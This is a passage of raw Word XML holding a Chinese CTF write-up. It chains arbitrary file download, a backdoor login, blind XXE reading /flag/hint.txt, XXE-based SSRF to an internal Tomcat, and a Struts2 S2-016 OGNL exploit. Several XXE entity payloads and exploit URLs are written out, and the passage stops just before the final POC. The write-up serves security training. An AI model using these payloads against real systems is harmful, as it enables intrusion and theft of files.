      <w:r w:rsidR="00E45CCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00525B4F" w:rsidRDefault="00525B4F" w:rsidP="00525B4F">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00525B4F" w:rsidRDefault="00525B4F" w:rsidP="00074F5A">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00074F5A" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>基于开源项目</w:t>
      </w:r>
      <w:r w:rsidR="00074F5A" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Quick4j</w:t>
      </w:r>
      <w:r w:rsidR="00074F5A" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，下载相关配置文件和class</w:t>
      </w:r>
      <w:r w:rsidR="00B901D1" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r w:rsidR="00074F5A" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>码文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5824" w:rsidRDefault="00032D25" w:rsidP="00032D25">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F5E3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于页面标题的版权都用的quick</w:t>
      </w:r>
      <w:r w:rsidR="009F5E3B">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009F5E3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j，去GitHub上搜索即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355BEE" w:rsidRDefault="00842C4E" w:rsidP="005C5824">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="009F5E3B" w:rsidRPr="00406B08">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://github.com/Eliteams/quick4j</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009F5E3B" w:rsidRDefault="00D22BF9" w:rsidP="00032D25">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C5EBA" w:rsidRDefault="00944585" w:rsidP="00032D25">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E36E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己搭建下，</w:t>
      </w:r>
      <w:r w:rsidR="000C2F5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参照项目结构，</w:t>
      </w:r>
      <w:r w:rsidR="003E36E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载里面的关键配置文件和class文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E36E2" w:rsidRDefault="00725616" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>由于和项目基本没变化，可以直接下载UserController的class</w:t>
      </w:r>
      <w:r w:rsidR="00E749FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件进行审计。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E749FD" w:rsidRPr="00143188" w:rsidRDefault="00E749FD" w:rsidP="00032D25">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00143188">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/rest/user/getInfomation?filename=WEB-INF/classes/com/eliteams/quick4j/web/controller/UserController.class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E36E2" w:rsidRDefault="00E749FD" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="710FFAB4" wp14:editId="21062BC7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E4" w:rsidRDefault="004445E4" w:rsidP="00032D25"/>
    <w:p w:rsidR="004445E4" w:rsidRDefault="004445E4" w:rsidP="00032D25"/>
    <w:p w:rsidR="00143188" w:rsidRDefault="004445E4" w:rsidP="004B19CD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DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
      <w:r w:rsidR="00981005" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r w:rsidR="00981005" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00143188" w:rsidRDefault="001E28A9" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用java字节码反编译软件查看，如:jd-gui:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E28A9" w:rsidRDefault="004445E4" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72435AFA" wp14:editId="41D41C0C">
            <wp:extent cx="5274310" cy="2242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E4" w:rsidRDefault="004445E4" w:rsidP="00032D25"/>
    <w:p w:rsidR="004445E4" w:rsidRDefault="004445E4" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很容易发现一个奇怪的URL，</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004445E4">
        <w:t>/nicaicaikan_url_23333_secret</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00BD6A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存在XXE漏洞</w:t>
      </w:r>
      <w:r w:rsidR="0023786F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BD6A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考察Blind</w:t>
      </w:r>
      <w:r w:rsidR="00BD6A4B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD6A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r w:rsidR="00931A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00BD6A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00931A5F" w:rsidRDefault="00931A5F" w:rsidP="00032D25"/>
    <w:p w:rsidR="00931A5F" w:rsidRDefault="00981005" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（4）</w:t>
      </w:r>
      <w:r w:rsidR="009205B9" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>发现后门提权</w:t>
      </w:r>
      <w:r w:rsidR="009205B9" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009205B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0076745D" w:rsidRDefault="0076745D" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然直接访问会401未授权</w:t>
      </w:r>
      <w:r w:rsidR="00B30240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0076745D" w:rsidRDefault="0076745D" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47691DD7" wp14:editId="60D41197">
            <wp:extent cx="5274310" cy="2214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40" w:rsidRDefault="00B30240" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思考如何获得</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B30240">
        <w:t>super_admin</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>角色权限。</w:t>
      </w:r>
      <w:r w:rsidR="001357A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阅读代码发现验证操作在</w:t>
      </w:r>
      <w:r w:rsidR="001357A2" w:rsidRPr="001357A2">
        <w:t>SecurityRealm</w:t>
      </w:r>
      <w:r w:rsidR="001357A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00B90477">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下载看代码</w:t>
      </w:r>
      <w:r w:rsidR="001357A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001357A2" w:rsidRDefault="00B90477" w:rsidP="00032D25">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB05A3">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rest/user/getInfomation?filename=WEB-INF/classes/com/eliteams/quick4j/web/security/SecurityRealm.class</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB05A3" w:rsidRDefault="00EB05A3" w:rsidP="00032D25"/>
    <w:p w:rsidR="00EB05A3" w:rsidRDefault="00EB05A3" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里存在</w:t>
      </w:r>
      <w:r w:rsidR="00F75692">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后门：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F75692" w:rsidRDefault="00FB04D5" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E79D93" wp14:editId="34A85CC4">
            <wp:extent cx="5274310" cy="1800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D5" w:rsidRDefault="00FB04D5" w:rsidP="00032D25"/>
    <w:p w:rsidR="00FB04D5" w:rsidRDefault="00FB04D5" w:rsidP="00FB04D5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一个小trick，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB04D5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f5a5a608</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB04D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值为0。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB04D5" w:rsidRDefault="00FB04D5" w:rsidP="00FB04D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB04D5" w:rsidRDefault="006D34AC" w:rsidP="00FB04D5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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006D34AC">
        <w:t>superadmin_hahaha_2333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006D34AC">
        <w:t>f5a5a608</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00CE231B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6FF5" w:rsidRDefault="005A6FF5" w:rsidP="00FB04D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6FF5" w:rsidRPr="00DE40F7" w:rsidRDefault="002F1873" w:rsidP="00FB04D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr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Pr="00DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> blind xxe </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>读取hint文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1873" w:rsidRPr="00FB04D5" w:rsidRDefault="002F1873" w:rsidP="00FB04D5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根据提示，使用盲打xxe读取/flag/hint.txt</w:t>
      </w:r>
      <w:r w:rsidR="00CB4D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001F1ED0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有一行数据</w:t>
      </w:r>
      <w:r w:rsidR="00AF4246">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用http协议</w:t>
      </w:r>
      <w:r w:rsidR="00AF4246">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传出数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
      <w:r w:rsidR="006050D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E674C" w:rsidRDefault="005E674C" w:rsidP="00032D25"/>
    <w:p w:rsidR="009912FF" w:rsidRDefault="002F5074" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009912FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:r w:rsidR="001F1ED0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r w:rsidR="009912FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag的提示信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7F6B" w:rsidRDefault="00BE7F6B" w:rsidP="00032D25">
      <w:r w:rsidRPr="00BE7F6B">
        <w:t>&lt;!ENTITY % payload SYSTEM "file:///flag/hint.txt"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E674C" w:rsidRDefault="009912FF" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8463EC" wp14:editId="74E468F7">
            <wp:extent cx="5274310" cy="2095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FF" w:rsidRDefault="009912FF" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C02CEF" wp14:editId="68F32677">
            <wp:extent cx="5274310" cy="328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5" w:rsidRDefault="009A68A5" w:rsidP="00032D25"/>
    <w:p w:rsidR="006D02DA" w:rsidRDefault="006D02DA" w:rsidP="004B19CD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 w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>进行SSRF攻击</w:t>
      </w:r>
      <w:r w:rsidR="002F7CBA" w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D02DA" w:rsidRDefault="006D02DA" w:rsidP="00032D25"/>
    <w:p w:rsidR="00FB6028" w:rsidRDefault="00FB6028" w:rsidP="00032D25">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据提示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A68A5" w:rsidRDefault="00FB6028" w:rsidP="00FB6028">
      <w:r w:rsidRPr="00FB6028">
        <w:t>Flag in intranet tomcat_2 server 8080 port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB6028" w:rsidRDefault="00FB6028" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00FB6028" w:rsidRDefault="00FB6028" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试使用xxe进行SSRF攻击</w:t>
      </w:r>
      <w:r w:rsidR="004E5858">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D94377">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于是Docker环境，</w:t>
      </w:r>
      <w:r w:rsidR="00166698">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接使用tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00166698">
        <w:t>_2:8080</w:t>
      </w:r>
      <w:r w:rsidR="00166698">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E5858" w:rsidRDefault="00667B8F" w:rsidP="00FB6028">
      <w:r w:rsidRPr="002758AF">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % payload SYSTEM "http://tomcat_2:8080/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667B8F" w:rsidRDefault="00667B8F" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00DB48ED" w:rsidRPr="00DB48ED" w:rsidRDefault="00DB48ED" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10355C4C" wp14:editId="27F56ED9">
            <wp:extent cx="5274310" cy="3860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8F" w:rsidRDefault="009523EE" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="004041E1" w:rsidRPr="00406B08">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://tomcat_2:8080/hello.action</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004041E1" w:rsidRDefault="00AF1DD0" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AABD528" wp14:editId="06CAD73A">
            <wp:extent cx="5274310" cy="214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D0" w:rsidRDefault="00AF1DD0" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00AF1DD0" w:rsidRDefault="00AF1DD0" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到提示:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1DD0">
        <w:t xml:space="preserve"> This is Struts2 Demo APP, try to read /flag/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D12F76" w:rsidRDefault="00D12F76" w:rsidP="00FB6028"/>
    <w:p w:rsidR="004B19CD" w:rsidRDefault="004B19CD" w:rsidP="004B19CD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Pr="00DE40F7">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>漏洞读取flag文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B19CD" w:rsidRPr="004B19CD" w:rsidRDefault="004B19CD" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00D12F76" w:rsidRDefault="002B196B" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里考察的是经典的S2-</w:t>
      </w:r>
      <w:r>
        <w:t>016</w:t>
      </w:r>
      <w:r w:rsidR="00895D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的exp编写能力</w:t>
      </w:r>
      <w:r w:rsidR="00A929CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0064555C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="009C2137">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞及</w:t>
      </w:r>
      <w:r w:rsidR="0064555C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OGNL语言的理解</w:t>
      </w:r>
      <w:r w:rsidR="00895D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D1B" w:rsidRDefault="00895D1B" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意几点:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D1B" w:rsidRDefault="00895D1B" w:rsidP="00895D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我使用了jvm-sandbox阻拦了命令执行操作，只能通过</w:t>
      </w:r>
      <w:r w:rsidR="00761171">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改写POC</w:t>
      </w:r>
      <w:r w:rsidR="00C169C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用OGNL语言</w:t>
      </w:r>
      <w:r w:rsidR="00DF22DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D1B" w:rsidRDefault="00762F6E" w:rsidP="00895D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网上流传的命令执行POC末尾有空字符，执行结果无法传输到外网。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762F6E" w:rsidRDefault="00762F6E" w:rsidP="003913F0"/>
    <w:p w:rsidR="00DC0C88" w:rsidRDefault="00DC0C88" w:rsidP="003913F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写OGNL的POC，顺利读到flag文件</w:t>
      </w:r>
      <w:r w:rsidR="006F09AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00F23591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做题过程应该在本地调试好，再</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打到服务器上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3AFE" w:rsidRDefault="001E4AA3" w:rsidP="003913F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个简单的POC为：</w:t>
      </w:r>
    </w:p>
